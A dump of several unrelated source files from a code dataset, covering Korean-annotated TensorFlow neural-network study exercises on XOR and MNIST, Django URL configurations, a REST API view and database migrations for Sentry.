accuracy = tf.reduce_mean(tf.cast(tf.equal(predicted, Y), dtype=tf.float32))
# Lounch graph
sess = tf.Session()
# Initioalize Tensorflow variables
sess.run(tf.global_variables_initializer())
for step in range(1001):
sess.run(train, feed_dict={X:x_data, Y:y_data})
if step%100 == 0:
print(step, sess.run(cost, feed_dict={X:x_data, Y:y_data}))
# Accuracy report
h, c, a = sess.run([hypothesis, predicted, accuracy], feed_dict={X:x_data, Y:y_data})
print("\nHypothesis:", h, "\nCorrect:", c, "\nAccuracy:", a)
# 오류는 없지만 손실함수가 감소하지 않는다. 지나치게 단순해서, 1층!~
# accuracy : [0.50208956]
# 위의 망과 비슷한 2층 신경망
import numpy as np
import tensorflow as tf
x_data = np.array([[0,0], [0,1], [1,0], [1,1]], dtype=np.float32)
y_data = np.array([[0], [1], [1], [0]], dtype=np.float32)
X = tf.placeholder(tf.float32)
Y = tf.placeholder(tf.float32)
W1 = tf.Variable(tf.random_normal([2,2]), name='weight1') # 앞의 2는 데이터수, 뒤의 2는 노드수(출력값의 개수)
b1 = tf.Variable(tf.random_normal([2]), name='bias1') # 바이어스는 출력값의 개수와 맞춰줘야 한다.
layer1 = tf.sigmoid(tf.matmul(X,W1) + b1)
# layer1 = tf.nn.relu(tf.matmul(X,W1) + b1)
W2 = tf.Variable(tf.random_normal([2,1]), name='weight2')
b2 = tf.Variable(tf.random_normal([1]), name='bias2')
hypothesis = tf.sigmoid(tf.matmul(layer1,W2) + b2)
cost = -tf.reduce_mean(Y*tf.log(hypothesis) + (1-Y) * tf.log(1-hypothesis)) # 손실함수 구하기
train = tf.train.GradientDescentOptimizer(learning_rate=0.1).minimize(cost) # 경사감소법으로 손실함수 줄여나가기
# Accuracy computation
# True is hypothesis>0.5 else False
predicted = tf.cast(hypothesis>0.5, dtype=tf.float32)
accuracy = tf.reduce_mean(tf.cast(tf.equal(predicted, Y), dtype=tf.float32))
# Lounch graph
sess = tf.Session()
# Initioalize Tensorflow variables
sess.run(tf.global_variables_initializer())
for step in range(1001):
sess.run(train, feed_dict={X:x_data, Y:y_data})
if step%100 == 0:
print(step, sess.run(cost, feed_dict={X:x_data, Y:y_data}))
# Accuracy report
h, c, a = sess.run([hypothesis, predicted, accuracy], feed_dict={X:x_data, Y:y_data})
print("\nHypothesis:", h, "\nCorrect:", c, "\nAccuracy:", a)
# Accuracy: 0.75
# 층이 많다고 무조건 정확도가 올라가는 것이 아니다.
# 왜냐하면 오차역전파를 하면서 시그모이드에 의해 항상 1보다 작은 숫자가 계속 곱해지면서 최종적인 값이 점점 작아지게 된다.
# 뒤로 갈 수록, 즉 입력값에 가까울 수록 영향력이 작아지면서 기울기가 사라지게 된다. vanishing gradient
# 그래서 렐루를 사용한다. 마지막만 시그모이드를 사용한다. 0~1 사이의 값을 가져야하기 때문에
# 초기값을 줄 때 유의사항
# 1. 0을 주면 안된다.
# 2. RBM은 어려우니 싸비에르, He
# W = np.random.randn(fan_in, fan_out/np.sqrt(fan_in)) # 싸비에르
# W = np.random.randn(fan_in, fan_out/np.sqrt(fan_in/2)) # He
# CNN 제외하고 xavier, relu, dropout, adam 사용
import tensorflow as tf
import numpy as np
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
nb_classes = 10
keep_prob = tf.placeholder(tf.float32)
X = tf.placeholder(tf.float32, [None, 784])
Y = tf.placeholder(tf.float32, [None, nb_classes])
###################################################
W1 = tf.get_variable("W1", shape=[784, 256], initializer=tf.contrib.layers.xavier_initializer())
b1 = tf.Variable(tf.random_normal([256]))
layer1 = tf.nn.relu(tf.matmul(X, W1) + b1)
layer1 = tf.nn.dropout(layer1, keep_prob=keep_prob)
W2 = tf.get_variable("W2", shape=[256, 128], initializer=tf.contrib.layers.xavier_initializer())
b2 = tf.Variable(tf.random_normal([128]))
layer2 = tf.nn.relu(tf.matmul(layer1, W2) + b2)
layer2 = tf.nn.dropout(layer2, keep_prob=keep_prob)
W3 = tf.get_variable("W3", shape=[128, nb_classes], initializer=tf.contrib.layers.xavier_initializer())
b3 = tf.Variable(tf.random_normal([nb_classes]))
hypothesis = tf.matmul(layer2, W3) + b3
###################################################
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=hypothesis, labels=Y))
optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)
# Test model
is_correct = tf.equal(tf.arg_max(hypothesis, 1), tf.arg_max(Y, 1))
accuracy = tf.reduce_mean(tf.cast(is_correct, tf.float32))
training_epochs = 15
batch_size = 100
sess = tf.Session()
sess.run(tf.global_variables_initializer())
for epoch in range(training_epochs):
avg_cost = 0
total_batch = int(mnist.train.num_examples / batch_size) # 1에폭 도는데 필요한 횟수
for i in range(total_batch):
batch_xs, batch_ys = mnist.train.next_batch(batch_size)
feed_dict = {X: batch_xs, Y: batch_ys, keep_prob:0.7}
c, _ = sess.run([cost, optimizer], feed_dict=feed_dict)
avg_cost += c / total_batch
print('Epoch:', '%04d' % (epoch +1), 'cost=', '{:.9f}'.format(avg_cost))
print("Accuracy:", accuracy.eval(session=sess, feed_dict={X:mnist.test.images, Y:mnist.test.labels, keep_prob:1}))
#### CNN 실습
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
sess = tf.InteractiveSession()
image = np.array([[[[1],[2],[3]],
[[4],[5],[6]],
[[7],[8],[9]]]], dtype=np.float32)
print(image.shape)
plt.imshow(image.reshape(3,3), cmap='Greys')
plt.show()
##########################
### 2층 CNN 진짜 실습(mnist)
##########################
import tensorflow as tf
import numpy as np
from tensorflow.examples.tutorials.mnist import input_data
import random
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
learning_rate = 0.001
training_epochs = 15
batch_size = 100
nb_classes = 10
X = tf.placeholder(tf.float32, [None, 784])
X_img = tf.reshape(X, [-1, 28, 28, 1]) # img 28x28x1 (black/white)
Y = tf.placeholder(tf.float32, [None, nb_classes])
#L1 ImgIn shape=(?, 28, 28, 1)
W1 = tf.Variable(tf.random_normal([3,3,1,32], stddev=0.01)) # 필터의 크기, 색깔, 필터의 개수
# W1 = tf.get_variable("W1", shape=[3,3,1,32], initializer=tf.contrib.layers.xavier_initializer())???
# Conv통과 후 -> (?, 28, 28, 32)
# Pool통과 후 -> (?, 14, 14, 32)
L1 = tf.nn.conv2d(X_img, W1, strides=[1,1,1,1], padding='SAME')
print(L1)
L1 = tf.nn.relu(L1)
L1 = tf.nn.max_pool(L1, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME') # pooling 스트라이드 2
'''
Tensor("Conv2D:0", shape=(?, 28, 28, 32), dtype=float32)
Tensor("Relu:0", shape=(?, 28, 28, 32), dtype=float32)
Tensor("MaxPool:0", shape=(?, 14, 14, 32), dtype=float32) # 1층에서 출력값!!!!!의 형태
'''
# L2 ImgIn shape=(?, 14, 14, 32)
W2 = tf.Variable(tf.random_normal([3, 3, 32, 64], stddev=0.01)) # 필터의 크기, 필터의 두께(L1의 출력값이랑 맞춘다.32), 필터의 개수(이미지 64개가 만들어짐)
# Conv ->(?, 14, 14, 64)
# Pool ->(?, 7, 7, 64)
L2 = tf.nn.conv2d(L1, W2, strides=[1, 1, 1, 1], padding='SAME')
L2 = tf.nn.relu(L2)
L2 = tf.nn.max_pool(L2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')
L2_flat = tf.reshape(L2, [-1, 7*7*64]) # 다시 1차원으로 죽 펴준다.
'''
Tensor("Conv2D_1:0", shape=(?, 14, 14, 64), dtype=float32)
Tensor("Relu_1:0", shape=(?, 14, 14, 64), dtype=float32)
Tensor("MaxPool_1:0", shape=(?, 7, 7, 64), dtype=float32)
Tensor("Reshape_1:0", shape=(?, 3136), dtype=float32)
'''
L2 = tf.reshape(L2, [-1,7*7*64]) # 위에꺼 출력해보고 적는다.
W3 = tf.get_variable("W3", shape=[7*7*64, 10], initializer=tf.contrib.layers.xavier_initializer())
b = tf.Variable(tf.random_normal([10]))
hypothesis = tf.matmul(L2, W3) + b
# define cost/Loss & optimizer
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=hypothesis, labels=Y))
optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)
sess = tf.Session()
sess.run(tf.global_variables_initializer())
# train my model
print('Learning started. It takes sometime.')
for epoch in range(training_epochs):
avg_cost = 0
total_batch = int(mnist.train.num_examples / batch_size)
for i in range(total_batch):
batch_xs, batch_ys = mnist.train.next_batch(batch_size)
feed_dict = {X: batch_xs, Y: batch_ys}
c, _ = sess.run([cost, optimizer], feed_dict=feed_dict)
avg_cost += c / total_batch
print('Epoch:', '%04d' % (epoch + 1), 'cost =', '{:.9f}'.format(avg_cost))
print('Learning Finished!')
# Test model and check accuracy
correct_prediction = tf.equal(tf.argmax(hypothesis, 1), tf.argmax(Y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print('Accuracy:', sess.run(accuracy, feed_dict={
X: mnist.test.images, Y: mnist.test.labels}))
# Get one and predict
r = random.randint(0, mnist.test.num_examples - 1)
print("Label: ", sess.run(tf.argmax(mnist.test.labels[r:r + 1], 1)))
print("Prediction: ", sess.run(
tf.argmax(hypothesis, 1), feed_dict={X: mnist.test.images[r:r + 1]}))
##########################
### 3층 CNN 진짜 실습(mnist)
##########################
##########################
##########################
##########################
import tensorflow as tf
import numpy as np
from tensorflow.examples.tutorials.mnist import input_data
import random
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
learning_rate = 0.001
training_epochs = 15
batch_size = 100
keep_prob = tf.placeholder(tf.float32)
nb_classes = 10
X = tf.placeholder(tf.float32, [None, 784])
X_img = tf.reshape(X, [-1, 28, 28, 1]) # img 28x28x1 (black/white)
Y = tf.placeholder(tf.float32, [None, nb_classes])
#L1 ImgIn shape=(?, 28, 28, 1)
W1 = tf.Variable(tf.random_normal([3,3,1,32], stddev=0.01)) # 필터의 크기, 색깔, 필터의 개수
# W1 = tf.get_variable("W1", shape=[3,3,1,32], initializer=tf.contrib.layers.xavier_initializer())???
# Conv통과 후 -> (?, 28, 28, 32)
# Pool통과 후 -> (?, 14, 14, 32)
L1 = tf.nn.conv2d(X_img, W1, strides=[1,1,1,1], padding='SAME')
# print(L1)
L1 = tf.nn.relu(L1)
L1 = tf.nn.max_pool(L1, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME') # pooling 스트라이드 2
L1 = tf.nn.dropout(L1, keep_prob=keep_prob)
'''
Tensor("Conv2D:0", shape=(?, 28, 28, 32), dtype=float32)
Tensor("Relu:0", shape=(?, 28, 28, 32), dtype=float32)
Tensor("MaxPool:0", shape=(?, 14, 14, 32), dtype=float32) # 1층에서 출력값!!!!!의 형태
'''
# L2 ImgIn shape=(?, 14, 14, 32)
W2 = tf.Variable(tf.random_normal([3, 3, 32, 64], stddev=0.01)) # 필터의 크기, 필터의 두께(L1의 출력값이랑 맞춘다.32), 필터의 개수(이미지 64개가 만들어짐)
# Conv ->(?, 14, 14, 64)
# Pool ->(?, 7, 7, 64)
L2 = tf.nn.conv2d(L1, W2, strides=[1, 1, 1, 1], padding='SAME')
L2 = tf.nn.relu(L2)
L2 = tf.nn.max_pool(L2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')
L2 = tf.nn.dropout(L2, keep_prob=keep_prob)
'''
Tensor("Conv2D_1:0", shape=(?, 14, 14, 64), dtype=float32)
Tensor("Relu_1:0", shape=(?, 14, 14, 64), dtype=float32)
Tensor("MaxPool_1:0", shape=(?, 7, 7, 64), dtype=float32)
Tensor("Reshape_1:0", shape=(?, 3136), dtype=float32)
'''
W3 = tf.Variable(tf.random_normal([3,3,64,128], stddev=0.01))
L3 = tf.nn.conv2d(L2, W3, strides=[1,1,1,1], padding='SAME')
L3 = tf.nn.relu(L3)
L3 = tf.nn.max_pool(L3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')
L3 = tf.nn.dropout(L3, keep_prob=keep_prob)
L3 = tf.reshape(L3, [-1, 128*4*4])
'''
Tensor("Conv2D_2:0", shape=(?, 7, 7, 128), dtype=float32)
Tensor("Relu_2:0", shape=(?, 7, 7, 128), dtype=float32)
Tensor("MaxPool_2:0", shape=(?, 4, 4, 128), dtype=float32)
Tensor("dropout_2/mul:0", shape=(?, 4, 4, 128), dtype=float32)
Tensor("Reshape_1:0", shape=(?, 2048), dtype=float32)
'''
W4 = tf.get_variable("W4", shape=[128*4*4, 625], initializer=tf.contrib.layers.xavier_initializer())
b4 = tf.Variable(tf.random_normal([625]))
L4 = tf.nn.relu(tf.matmul(L3, W4) + b4)
L4 = tf.nn.dropout(L4, keep_prob=keep_prob)
'''
Tensor("Relu_3:0", shape=(?, 625), dtype=float32)
Tensor("dropout_3/mul:0", shape=(?, 625), dtype=float32)
'''
# L5 final fc 625 inputs -> 10 outputs
W5 = tf.get_variable("W5", shape=[625, 10], initializer=tf.contrib.layers.xavier_initializer())
b5 = tf.Variable(tf.random_normal([10]))
logits = tf.matmul(L4, W5) + 5
'''
Tensor("add_1:0", shape=(?, 10), dtype=float32)
'''
# define cost/Loss & optimizer
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=Y))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
# initialize
sess = tf.Session()
sess.run(tf.global_variables_initializer())
# train my model
print('Learning started. It takes sometime.')
for epoch in range(training_epochs):
avg_cost = 0
total_batch = int(mnist.train.num_examples / batch_size)
for i in range(total_batch):
batch_xs, batch_ys = mnist.train.next_batch(batch_size)
feed_dict = {X:batch_xs, Y:batch_ys, keep_prob:0.7}
c, _ = sess.run([cost, optimizer], feed_dict=feed_dict)
avg_cost += c / total_batch
print('Epoch:', '%04d' % (epoch + 1), 'cost =', '{:.9f}'.format(avg_cost))
print('Learning Finished!')
# Test model and check accuracy
correct_prediction = tf.equal(tf.argmax(hypothesis, 1), tf.argmax(Y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print('Accuracy:', sess.run(accuracy, feed_dict={
X:mnist.test.images, Y:mnist.test.labels, keep_prob:1}))
# Get one and predict
r = random.randint(0, mnist.test.num_examples - 1)
print("Label: ", sess.run(tf.argmax(mnist.test.labels[r:r + 1], 1)))
print("Prediction: ", sess.run(
tf.argmax(hypothesis, 1), feed_dict={X: mnist.test.images[r:r + 1]}))
|
ghost9023/DeepLearningPythonStudy
|
DeepLearning/DeepLearning/02_Deep_ChoTH/tensorflow_prac.py
|
Python
|
mit
| 18,788 | 0.011447 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.conf.urls import url
from . import feeds, views
urlpatterns = [
url(r'^$', views.PostListView.as_view(), name='list'),
url(
r'^category/(?P<slug>[-\w]+)/$',
views.PostListCategoryView.as_view(),
name='post-list-category'
),
url(
r'^(?P<year>\d{4})/(?P<month>\d{2})/(?P<day>\d{2})/(?P<slug>[-\w]+)/$',
views.PostDetailView.as_view(),
name='post-detail'
),
url(r'^feed/$', feeds.NewsFeed(), name='feed'),
url(r'^feed/(?P<slug>[-\w]+)/$', feeds.NewsCategoryFeed(), name='category-feed'),
]
if getattr(settings, 'GLITTER_NEWS_TAGS', False):
urlpatterns += [
url(r'^tag/(?P<slug>[-\w]+)/$', views.PostListTagView.as_view(), name='post-list-tag'),
]
|
blancltd/glitter-news
|
glitter_news/urls.py
|
Python
|
bsd-2-clause
| 849 | 0.002356 |
# Copyright (c) 2020, DjaoDjin inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
from rest_framework import generics
from ..mixins import CampaignMixin
from .serializers import CampaignSerializer
LOGGER = logging.getLogger(__name__)
class CampaignAPIView(CampaignMixin, generics.RetrieveDestroyAPIView):
"""
Retrieves a campaign
Retrieves the details of a ``Campaign``.
**Tags**: survey
**Examples**
.. code-block:: http
GET /api/cowork/campaign/best-practices/ HTTP/1.1
responds
.. code-block:: json
{
"slug": "best-practices",
"account": "envconnect",
"title": "Assessment on Best Practices",
"active": true,
"quizz_mode": false,
"questions": [
{
"path": "/product-design",
"title": "Product Design",
"unit": "assessment-choices",
},
{
"path": "/packaging-design",
"title": "Packaging Design",
"unit": "assessment-choices",
}
]
}
"""
serializer_class = CampaignSerializer
def get_object(self):
return self.campaign
def delete(self, request, *args, **kwargs):
"""
Deletes a campaign
Removes a ``Campaign`` and all associated ``Sample``
from the database.
**Tags**: survey
**Examples**
.. code-block:: http
DELETE /api/cowork/campaign/best-practices/ HTTP/1.1
"""
#pylint:disable=useless-super-delegation
return super(CampaignAPIView, self).delete(request, *args, **kwargs)
|
djaodjin/djaodjin-survey
|
survey/api/campaigns.py
|
Python
|
bsd-2-clause
| 3,013 | 0.000332 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-14 01:54
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import storage.models.labels
class Migration(migrations.Migration):
dependencies = [
('storage', '0014_auto_20170914_0146'),
]
operations = [
migrations.RemoveField(
model_name='accesslayer',
name='active_flag',
),
migrations.RemoveField(
model_name='accesslayer',
name='created_by',
),
migrations.RemoveField(
model_name='accesslayer',
name='creation_date',
),
migrations.RemoveField(
model_name='accesslayer',
name='last_modified',
),
migrations.RemoveField(
model_name='accesslayer',
name='updated_by',
),
migrations.AlterField(
model_name='accesslayer',
name='source',
field=models.ForeignKey(blank=True, default=storage.models.labels.GroupDefaultLabel('Access Layer Source'), help_text='the access layer source', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='access_layer', to='storage.Label'),
),
]
|
MartinPaulo/resplat
|
storage/migrations/0015_auto_20170914_0154.py
|
Python
|
lgpl-3.0
| 1,300 | 0.000769 |
"""effcalculator URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.conf.urls import url, include
from django.contrib.auth import views as auth_views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^api/', include('api.urls')),
url(r'^', include('frontend.urls'))
]
|
alvcarmona/efficiencycalculatorweb
|
effcalculator/effcalculator/urls.py
|
Python
|
gpl-3.0
| 915 | 0.001093 |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'GroupSeen'
db.create_table(u'sentry_groupseen', (
('id', self.gf('sentry.db.models.fields.bounded.BoundedBigAutoField')(primary_key=True)),
('project', self.gf('sentry.db.models.fields.FlexibleForeignKey')(to=orm['sentry.Project'])),
('group', self.gf('sentry.db.models.fields.FlexibleForeignKey')(to=orm['sentry.Group'])),
('user', self.gf('sentry.db.models.fields.FlexibleForeignKey')(to=orm['sentry.User'], db_index=False)),
('last_seen', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
))
db.send_create_signal(u'sentry', ['GroupSeen'])
# Adding unique constraint on 'GroupSeen', fields ['group', 'user']
db.create_unique(u'sentry_groupseen', ['user_id', 'group_id'])
def backwards(self, orm):
# Removing unique constraint on 'GroupSeen', fields ['group', 'user']
db.delete_unique(u'sentry_groupseen', ['user_id', 'group_id'])
# Deleting model 'GroupSeen'
db.delete_table(u'sentry_groupseen')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'sentry.user': {
'Meta': {'object_name': 'User', 'db_table': "'auth_user'"},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'sentry.accessgroup': {
'Meta': {'unique_together': "(('team', 'name'),)", 'object_name': 'AccessGroup'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'managed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['sentry.User']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['sentry.Project']", 'symmetrical': 'False'}),
'team': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '50'})
},
u'sentry.activity': {
'Meta': {'object_name': 'Activity'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Event']", 'null': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']"}),
'type': ('django.db.models.fields.PositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.User']", 'null': 'True'})
},
u'sentry.alert': {
'Meta': {'object_name': 'Alert'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']"}),
'related_groups': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'related_alerts'", 'symmetrical': 'False', 'through': u"orm['sentry.AlertRelatedGroup']", 'to': u"orm['sentry.Group']"}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
u'sentry.alertrelatedgroup': {
'Meta': {'unique_together': "(('group', 'alert'),)", 'object_name': 'AlertRelatedGroup'},
'alert': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Alert']"}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
u'sentry.event': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': u"orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']", 'null': 'True'}),
'server_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'time_spent': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
u'sentry.eventmapping': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'EventMapping'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']"})
},
u'sentry.group': {
'Meta': {'unique_together': "(('project', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
